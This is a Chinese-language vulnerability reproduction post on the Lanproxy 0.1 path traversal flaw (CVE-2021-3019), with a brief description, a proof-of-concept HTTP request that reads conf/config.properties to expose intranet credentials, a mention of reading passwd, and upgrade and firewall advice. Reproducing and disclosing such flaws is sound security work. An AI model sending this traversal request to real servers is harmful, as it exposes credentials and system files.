Lanproxy 路径遍历漏洞 (CVE-2021-3019)

一、漏洞简介

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

二、影响版本

lanproxy 0.1

三、漏洞复现

环境安装移步:

https://www.jianshu.com/p/6482ac354d34

Poc:/../conf/config.properties

GET/../conf/config.propertiesHTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

读取passwd

curl访问也行

四、安全建议

升级版本,和防火墙做相关路径../跳跃限制。

参考:

https://mp.weixin.qq.com/s/t8Nn3Nb4-cXh-2IfCA6mzw

https://www.cnblogs.com/limanman233/p/14239071.html

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

Lanproxy 路径遍历漏洞 (CVE-2021-3019)相关推荐

  1. 风炫安全Web安全学习第四十三节课 路径遍历漏洞

    风炫安全Web安全学习第四十三节课 路径遍历漏洞 路径遍历 0x01 漏洞概述 路径遍历攻击(也称作目录遍历)的目标是访问web根目录外存储的文件和目录.通过操纵使用"点-斜线(-/)&qu ...

  2. 浅析路径遍历漏洞 文/饭

    许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名,形如:http://www.nuanyue.com/getfile=image.jgp 当服务器处理传送过来 ...

  3. CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现

    Apache Flink 上传路径遍历漏洞复现 一.漏洞描述 Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文 ...

  4. Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

    Fortinet FortiOS路径遍历漏洞 CVE-2018-13379 一.漏洞介绍 Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上 ...

  5. java 路径遍历 漏洞修复

    private static Pattern FilePattern = Pattern.compile("[\\\\/:*?\"<>|]"); /*** 路 ...

  6. linux系统sip网络电话,Yealink网络电话SIP-T38G绝对路径遍历漏洞

    发布日期:2014-08-03 更新日期:2014-08-11 受影响系统: yealink SIP-T38G 描述: ---------------------------------------- ...

  7. citrix 路径遍历 rce漏洞(CVE-2019-19781)

    漏洞描述 Citrix旗下多款交付控制器和网关存在RCE漏洞,攻击者在无需身份验证的情况下就可执行任意命令.根据其他安全网站的说法,这个RCE漏洞会有一个标记漏洞(其中之一的标记),即本次报道的Cit ...

  8. Citrix路径遍历(CVE-2019-19781)

    漏洞描述 Citrix旗下多款交付控制器和网关存在RCE漏洞,攻击者在无需身份验证的情况下就可执行任意命令.根据其他安全网站的说法,这个RCE漏洞会有一个标记漏洞(其中之一的标记),即本次报道的Cit ...

  9. CVE-2021-42013:Apache HTTP Server目录遍历漏洞

    前言 漏洞原理 该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件 ...

最新文章

  1. 大学计算机专业选哪个,这么多大学都有计算机专业 究竟选哪个好呢?
  2. NFS、SSH、SAMBA
  3. misc高阶 攻防世界_玄幻世界(修真、仙侠、奇幻、神话)修炼体系基础模型设定。...
  4. java类的命名规范_浅谈Java中的命名规范
  5. 不要在nodejs中阻塞event loop
  6. 已拦截跨源请求:同源策略禁止读取位于XXXXXXXXXXXXXXXX/demo_test.txt 的远程资源。(原因:CORS 请求不是 http)
  7. 3.9 对称三位素数
  8. 前端学习(1509):单页应用SPA特点
  9. Resources$NotFoundException
  10. 账户体系、支付服务设计第一版
  11. Oracle.start with … connect by [… and] prior…order siblings by …
  12. python提取cad坐标_从CAD图里提取坐标的方法
  13. CC2530单片机开发--串口
  14. VUE项目引入公共样式的styl文件
  15. php 格式化金额(每三位加一逗号)
  16. 苹果手机怎么在照片上添加文字_用手机修图软件,给照片添加精美的文字排版,如何操作最简单?...
  17. 利用snmp oid获取交换机型号版本
  18. android 仿微信demo————微信消息界面实现(移动端)
  19. 小米air2se耳机只有一边有声音怎么办_盘点2020半入耳蓝牙耳机排名
  20. java毕业生设计在线辅导答疑系统计算机源码+系统+mysql+调试部署+lw

热门文章

  1. 节点表征学习与节点预测和边预测
  2. Python数据分析入门笔记10——简单案例练习(学生信息分析)
  3. landsat8 编辑头文件信息
  4. 微信小程序之小程序审核
  5. 英语语言学论文选题 计算机,88个英语语言学、语言论文题目选题参考
  6. Linux被熊孩子攻破了?
  7. pytorch中view()和flatten
  8. 报错解决:Reason: Failed to determine a suitable driver class
  9. 小几届的学弟问我,软件测试岗是选11k的华为还是20k的小公司,我直呼受不了,太凡尔赛了
  10. 中华活页文选杂志中华活页文选杂志社中华活页文选编辑部2022年第8期目录